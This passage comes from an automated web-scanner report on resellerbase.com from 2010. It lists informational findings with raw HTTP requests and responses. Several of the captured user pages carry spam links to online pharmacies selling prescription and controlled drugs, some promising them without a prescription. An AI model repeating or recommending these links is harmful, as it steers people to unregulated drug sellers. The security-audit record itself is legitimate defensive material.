<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.ian.com/ian/signup/home.jsp?cid=104772" name="link_20"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.308. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.309. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.310. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.311. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.312. http://www.resellerbase.com/travel-vaccation/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /travel-vaccation/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.313. http://www.resellerbase.com/upgrade.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /upgrade.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /upgrade.php?id=555-555-0199@example.com&pflag=retrieve&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Upgrade a Listing</t
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.314. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /user_detail.php?u=iabuni HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:06:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.fioricet-rx.com/">http://www.fioricet-rx.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.fioricet-buyonline.com">Fioricet Buy Online</a> | <a href="http://www.fioricet-order.com">Fioricet Order</a> | <a href="http://www.fioricet-40mg-generic.com">Fioricet 40 mg Generic</a> | <a href="http://www.fioricetsupply.com"> Fioricet Supply </a> | <a href="http://www.fioricetcheap.com"> Fioricet Cheap </a> | <a href="http://www.fioricet40mg.com"> Fioricet 40 mg </a>|<a href="http://www.fioricet-generic.com"> Fioricet Generic </a> | <a href="http://www.fioricetdiscount.com/"> Fioricet Discount </a> | <a href="http://www.fioricet-pain-relief.com"> Fioricet Pain Relief</a> | <a href="http://www.prescription-fioricet.com"> Prescription Fioricet </a> | <a href="http://www.buy-fioricet-generic.com"> Buy Fioricet Generic</a> | <a href="http://www.fioricet-fiorcet.com/"> Fioricet Fiorcet </a> | <a href="http://www.fioricetprice.com"> Fioricet Price</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.315. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /user_detail.php?u=uingr HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.buying-rx.com/">http://www.buying-rx.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.bewellbehealthy.com">Be Well Be Healthy</a> | <a href="http://www.4life-health.com">4 Life Health</a> | <a href="http://www.eprescription-drug.com">E Prescription Drug</a> | <a href="http://www.online-antibiotics.info"> Online Antibiotics</a> | <a href="http://www.approvedpillsource.info">Approved Pill Source </a> | <a href="http://www.approvedrx.info"> Approved Rx </a> | <a href="http://www.SEXY-PHARMACY.COM"> Sexy Pharmacy </a> |<a href="http://www.brandnamerx.info"> Brand Name Rx</a> | <a href="http://www.brandrx.info"> Brand Rx </a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=104">Allergy Products</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=1">Buy Anti Depressants</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=10">Get Antibiotics</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=69">Order Asthma Products</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=5">Blood Presure</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=7">Diabetes Pills</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=76">Formigran, Maxalt, Migraeflux, Pirazetam</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=174">Adekin For Parkinson</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=11">Sleep & Insomnia - Novanox, Planum</a> | <a href="http://www.buying-rx.com/cart.php?action=view_cat&id=74">Cholesterol - Ezetrol, Simvastatin, Sortis, Zocor</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.316. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /user_detail.php?u=bayrar HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.rx-buy.info/">http://www.rx-buy.info/</a>
...[SNIP]...
<td width="130">
<a href="http://www.instantrx.info">Instant Rx</a> | <a href="http://www.morerx.info">More Rx</a> | <a href="http://www.rxhint.info">Rx Hint</a> | <a href="http://www.healthstoreforall.com"> Health Store For All</a> | <a href="http://www.superdiscountprescriptions.com">Super Discount Prescription</a> | <a href="http://www.yourpillrefill.com"> Your Pill Refill </a>|<a href="http://www.PLANUM-TEMAZEPAM.COM"> Planum Temazepam</a> | <a href="http://www.GELONIDA-PARACETAMOL.INFO"> Gelonida Paracetamol </a> | <a href="http://www.NARCOTIC-PHARMACY.COM"> Narcotic Pharmacy </a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=104">Allergy Products</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=1">Buy Anti Depressants</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=10">Get Antibiotics</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=69">Order Asthma Products</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=5">Blood Presure</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=7">Diabetes Pills</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=76">Formigran, Maxalt, Migraeflux, Pirazetam</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=174">Adekin For Parkinson</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=11">Sleep & Insomnia - Novanox, Planum</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=74">Cholesterol - Ezetrol, Simvastatin, Sortis, Zocor</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.317. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=rassis HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.rxassistent.com/">http://www.rxassistent.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.GETRXPHARMACY.com">Get Rx Pharmacy</a> | <a href="http://www.BUY-PHARMACY-DRUGS.com">Buy Pharmacy Drugs</a> | <a href="http://www.MY-DISCOUNT-DRUGSTORE.com">My Discount Drugstore</a> | <a href="http://www.buy-rx.eu"> Buy Rx</a> | <a href="http://www.happyrxshop.com">Happy Rx Shop </a> | <a href="http://www.RXPHARMACY-BUY.com"> Rxpharmacy Buy </a>|<a href="http://www.HAPPYRXBUY.com"> Happy Rx Buy</a> | <a href="http://www.BUYCOOLRX.com"> Buy Cool Rx </a>| <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=1">Online Allergies</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=7">No Prescription Anti Depressants</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=29">Generic Antibiotics</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=6">Cholesterol Pills</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=9">Epilepsy Drugs</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=12">Herpes - Famvir, Rebetol, Valtrex</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=14">Hormonol Pharmacy</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=20">All Rx Products</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=23">Rheumatic - Arava, Decadron, Naprosyn</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=13">Hiv - Retrovir, Sustiva, Videx, Zerit</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.318. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=somad HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.somawatsonbrand.com/">http://www.somawatsonbrand.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.anti-depressants-pharmacy.com/soma.php">Soma Muscle Relaxant</a> <a href="http://www.soma-drugs.com/soma.php">Soma Pharmacy</a> <a href="http://www.clickapill.com/soma.php">Relax Stiffness With Soma</a> <a href="http://www.approvedpillsource.com/soma.php">Muscle Injuries Go Away With Soma</a> <a href="http://www.buy-ultracet-online.com/soma.php">Buy Soma</a> <a href="http://www.clicknowrx.com/soma.php">OrderSoma</a> <a href="http://www.fioricetsupply.com/soma.php">Cheap Soma</a> <a href="http://www.tramadolsupply.com/soma.php">Get Soma</a> <a href="http://www.PILLS2ME.com/soma.php">Soma For Sprains</a> <a href="http://www.healthyrecipes4all.com/soma.php">Soma - Watson Brand</a> <a href="http://www.getmemypills.com/soma.php">Generic Soma</a> <a href="http://www.rxdiscountplus.com/soma.php">Soma - 350 mg - 30 Tabs</a> <a href="http://www.rxhint.com/soma.php">Soma - 350 mg - 90 Tabs</a> <a href="http://www.FREEPRESCRIPTIONSRX.com/soma.php">Soma 350 mg - 30 Tabs Watson </a> <a href="http://www.PRESCRIPTIONS-STORE.com/soma.php">Soma - 350 mg - 90 Tabs Watson </a> <a href="http://www.BUY-PRESCRIPTION-MEDS.com/soma.php">Choose Soma</a> <a href="http://www.PILLS-VALUE.com/soma.php">Soam From Rx Pharmacy</a> <a href="http://www.PRIVACY-RX-PILLS.com/soma.php">Treat Pain With Soma</a> <a href="http://www.DRUGS-TO-GO.com/soma.php">Soma Pill</a> <a href="http://www.CLICK2BUYDRUGS.com/soma.php">Soma Drug</a> <a href="http://www.paylessforgeneric.com/soma.php">Treat With Soma</a> <a href="http://www.bestgenericprice.com/soma.php">Soma medicine</a> <a href="http://www.get-rx-pharmacy.com/soma.php">Oral Soma</a> <a href="http://www.qualitygenericpills.com/soma.php">Soma Muscle Relaxant</a> <a href="http://www.reliableprescriptionsonline.com/soma.php">Relax Stiffness With Soma</a> <a href="http://www.rx-free.com/soma.php">Muscle Injuries Go Away With Soma</a> <a href="http://www.rxpills4u.com/soma.php">Buy Soma</a> <a 
href="http://www.drugstorecare.com/soma.php">Soma For Sprains</a> <a href="http://www.tramadol-rx.com/soma.php">Carisoprodol</a> <a href="http://www.ultram-rx.com/soma.php">Carisoprodol Online</a> <a href="http://www.purchase-zovirax.com/soma.php">Buy Soma</a> <a href="http://www.zoloft-prescription.com/soma.php">Order Soma</a> <a href="http://www.soma-prescription.com/soma.php">Get Soma</a> <a href="http://www.ultracetrx.com/soma.php">Soma Online</a> <a href="http://www.soma-drugs/">Soma Pharmacy</a> <a href="http://www.ultramrx.com/soma.php">Soma</a> <a href="http://www.cyclobenzaprinerx.com/soma.php">Soma Tabs</a> <a href="http://www.prozacrx.com/soma.php">Carisoprodol - Muscle Spasms Treat</a> <a href="http://www.amoxicillinrx.com/soma.php">Carisoprodol - 350 mg - 30 Tabs</a> <a href="http://www.esgicplus-rx.com.com/soma.php">Carisoprodol - 350 mg - 90 Tabs</a> <a href="http://www.drugsforyourhealth.com/cart.php?action=view&id=532">Somadril Pill</a> <a href="http://www.buying-rx.com/cart.php?action=view&id=532">Somadril Muscle Relaxant</a> <a href="http://www.rx-buy.info/cart.php?action=view&id=532">Same as Soma - Somadril </a> <a href="http://www.customerpharmacy.com/cart.php?action=view&id=532">Generic Soma</a> <a href="http://www.freebonusrx.com/cart.php?action=view&id=532">Somadril Tabs</a> <a href="http://www.healthcare-opportunity.com/cart.php?action=view&id=532">Somadril Muscle Relaxant</a> <a href="http://www.prescriptionconsult.com/cart.php?action=view&id=532">Somadril Online</a> <a href="http://www.rxalternativehealth.com/cart.php?action=view&id=532">Somadril For Nervous System</a> <a href="http://www.happyrxpharmacy.com/cart.php?action=view&id=532">Somadril Effect</a> <a href="http://www.bewellbehealthy.com/cart.php?action=view&id=532">Somadril For Strains</a> <a href="http://www.4life-health.com/cart.php?action=view&id=532">Somadril - Muscle Spasms Treat</a> <a href="http://www.eprescription-drug.com/cart.php?action=view&id=532">Order Somadril </a> 
<a href="http://www.online-antibiotics.info/cart.php?action=view&id=532">Get Somadril </a> <a href="http://www.approvedpillsource.info/cart.php?action=view&id=532">Somadril Pharmacy</a> <a href="http://www.morerx.info/cart.php?action=view&id=532">Somadril For Injury</a> <a href="http://www.rxhint.info/cart.php?action=view&id=532">Somadril For Nervous System</a> <a href="http://www.healthstoreforall.com/cart.php?action=view&id=532">Somadril Effect</a> <a href="http://www.superdiscountprescriptions.com/cart.php?action=view&id=532">Somadril For Nervous System</a> <a href="http://www.yourpillrefill.com/cart.php?action=view&id=532">Somadril 350 mg x100 Tabs</a> <a href="http://www.PLANUM-TEMAZEPAM.com/cart.php?action=view&id=532">Oral Somadril</a> <a href="http://www.GELONIDA-PARACETAMOL.INFO/cart.php?action=view&id=532">Somadril For Injury</a> <a href="http://www.PARACETAMOL-ANALGESIC.INFO/cart.php?action=view&id=532">Somadril For Stiffness</a>
<a href="http://www.somasupply.com/">Soma Supply</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.319. http://www.resellerbase.com/user_detail.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /user_detail.php?u=genmed HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:03:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.genericmedsale.com">http://www.genericmedsale.com</a>
...[SNIP]...
<td width="130">
